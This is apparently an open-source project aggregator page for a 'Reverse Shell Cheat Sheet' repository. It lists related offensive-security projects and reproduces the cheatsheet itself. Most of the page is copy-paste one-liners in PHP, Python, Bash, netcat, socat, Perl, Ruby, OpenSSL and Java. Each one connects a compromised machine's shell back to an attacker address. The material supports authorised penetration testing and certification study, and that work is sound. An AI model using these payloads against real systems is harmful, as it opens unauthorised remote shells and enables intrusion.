security-cheatsheet / Reverse Shell Cheatsheet
Licence: mit
🙃 Reverse Shell Cheat Sheet 🙃
Stars: ✭ 297
Programming Languages
Projects that are alternatives of or similar to Reverse Shell Cheatsheet
Offensive-Reverse-Shell-Cheat-Sheet
Offensive Reverse Shell (Cheat Sheet)
Stars: ✭ 138 (-53.54%)
Mutual labels: reverse-shell, penetration-testing, oscp, redteam
Hrshell
HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.
Stars: ✭ 193 (-35.02%)
Mutual labels: penetration-testing, oscp, reverse-shell
gtfo
Search for Unix binaries that can be exploited to bypass system security restrictions.
Stars: ✭ 88 (-70.37%)
Mutual labels: reverse-shell, oscp, redteam
Oscp Pentest Methodologies
备考 OSCP 的各种干货资料/渗透测试干货资料
Stars: ✭ 166 (-44.11%)
Mutual labels: penetration-testing, redteam, oscp
ReversePowerShell
Functions that can be used to gain Reverse Shells with PowerShell
Stars: ✭ 48 (-83.84%)
Mutual labels: reverse-shell, penetration-testing, redteam
pentesting-notes
Notes from OSCP, CTF, security adventures, etc...
Stars: ✭ 38 (-87.21%)
Mutual labels: penetration-testing, oscp
ggtfobins
Get GTFOBins info about a given exploit from the command line
Stars: ✭ 27 (-90.91%)
Mutual labels: penetration-testing, oscp
Cheatsheet God
Penetration Testing Reference Bank - OSCP / PTP & PTX Cheatsheet
Stars: ✭ 3,521 (+1085.52%)
Mutual labels: penetration-testing, oscp
oscp-omnibus
A collection of resources I'm using while working toward the OSCP
Stars: ✭ 46 (-84.51%)
Mutual labels: penetration-testing, oscp
RedTeaming-Tactics-and-Techniques
Red Teaming Tactics and Techniques
Stars: ✭ 2,991 (+907.07%)
Mutual labels: oscp, redteam
reverse-ssh
Statically-linked ssh server with reverse shell functionality for CTFs and such
Stars: ✭ 548 (+84.51%)
Mutual labels: reverse-shell, penetration-testing
php-reverse-shell
PHP shells that work on Linux OS, macOS, and Windows OS.
Stars: ✭ 274 (-7.74%)
Mutual labels: reverse-shell, oscp
OSCP-A-Step-Forward
Opening the door, one reverse shell at a time
Stars: ✭ 126 (-57.58%)
Mutual labels: penetration-testing, oscp
ReverseShellDll
C++ Windows Reverse Shell - Universal DLL Hijack | SSL Encryption | Statically Linked
Stars: ✭ 69 (-76.77%)
Mutual labels: reverse-shell, redteam
GoPhish-Templates
GoPhish Templates that I have retired and/or templates I've recreated.
Stars: ✭ 76 (-74.41%)
Mutual labels: penetration-testing, redteam
dark-lord-obama
AV-evading Pythonic Reverse Shell with Dynamic Adaption Capabilities
Stars: ✭ 61 (-79.46%)
Mutual labels: penetration-testing, oscp
rconn
rconn is a multiplatform program for creating generic reverse connections. Lets you consume services that are behind firewall or NAT without opening ports or port-forwarding.
Stars: ✭ 231 (-22.22%)
Mutual labels: reverse-shell, reverse-proxy
Serpentine
C++/Win32/Boost Windows RAT (Remote Administration Tool) with a multiplatform Java/Spring RESTful C2 server and Go, C++/Qt5 frontends
Stars: ✭ 216 (-27.27%)
Mutual labels: penetration-testing, redteam
Reverse Shell Cheat Sheet
If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you’ll probably want an interactive shell.
If it’s not possible to add a new account / SSH key / .rhosts file and just log in, your next step is likely to be either trowing back a reverse shell or binding a shell to a TCP port. This page deals with the former.
Your options for creating a reverse shell are limited by the scripting languages installed on the target system – though you could probably upload a binary program too if you’re suitably well prepared.
The examples shown are tailored to Unix-like systems. Some of the examples below should also work on Windows if you use substitute “/bin/sh -i” with “cmd.exe”.
Each of the methods below is aimed to be a one-liner that you can copy/paste. As such they’re quite short lines, but not very readable.
Php :
php -r '$sock=fsockopen("192.168.0.5",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
Python :
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.5",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Bash :
bash -i >& /dev/tcp/192.168.0.1/8080 0>&1
Netcat :
nc -e /bin/sh 192.168.0.5 4444
Socat :
socat tcp-connect:192.168.0.5:4444 system:/bin/sh
Perl :
perl -e 'use Socket;$i="192.168.0.5";$p=4545;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Ruby :
ruby -rsocket -e'f=TCPSocket.open("192.168.0.5",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
OpenSSL:
On your machine (to receive, not a normal TCP connection)
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes # generate some arbitrary cert
openssl s_server -quiet -key key.pem -cert cert.pem -port 4444
On PWN'd client
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.0.5:4444 > /tmp/s; rm /tmp/s
Java :
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5< >/dev/tcp/192.168.0.5/4444;cat <& 5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
xterm :
xterm -display 192.168.0.5:4444
Note that the project description data, including the texts, logos, images, and/or trademarks,
for each open source project belongs to its rightful owner.
If you wish to add or remove any projects, please contact us at [email protected].